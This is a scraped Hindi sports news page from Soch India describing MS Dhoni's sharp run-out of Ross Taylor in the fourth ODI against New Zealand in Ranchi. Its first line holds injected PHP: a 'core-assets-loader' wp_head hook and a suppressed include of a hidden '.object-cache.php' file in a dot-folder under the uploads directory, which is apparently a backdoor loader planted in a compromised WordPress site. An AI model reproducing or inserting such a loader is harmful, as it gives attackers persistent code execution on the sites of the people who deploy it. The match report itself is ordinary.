add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); विकेट के पीछे फिर दिखा ‘धोनी मैजिक’ – SOCH INDIA
Menu

खेल
विकेट के पीछे फिर दिखा ‘धोनी मैजिक’

nobanner

विकेट के पीछे सबसे तेज रहने वाले टीम इंडिया के कप्तान महेंद्र सिंह धोनी रांची में न्यूजीलैंड के खिलाफ खेले जा रहे चौथे वनडे मैच में ऐसा कारनामा किया जिसे देख खुद कीवी बल्लेबाज भी हैरान रह गए.

दरअसल मैच के 46वें ओवर में रॉस टेलर ने फाइन लेग पर शॉट खेल कर दो रन लेने का प्रयास किया लेकिन धवल कुलकर्णी ने उतनी ही फुर्ती से विकेटकीपर धोनी को थ्रो पहुंचाया. धोनी ने गेंद विकेट पर मार टेलर को रनऑउट कर दिया. जिस अंदाज में धोनी ने गेंद को विकेट मारा इसे देखे फिल्ड में सब हैरान रह गए. धोनी की जगह अगर कोई दूसरा विकेटकीपर होता यकिनन टेलर दो रन पूरा कर लेते.

कुलकर्णी का थ्रो विकेट से काफी दूर था धोनी इस बात को समझ रहे थे धोनी ने अपनी सुझ-बुझ के सहारे विकेट से काफी दूर रहने के बाद भी टेलर को रनऑउट कर टीम बड़ी राहत दी.  ऑउट होकर पवेलियन लौट रहे रॉस टेलर खुद इस रनऑउट से हैरान दिखे.

आप भी देखें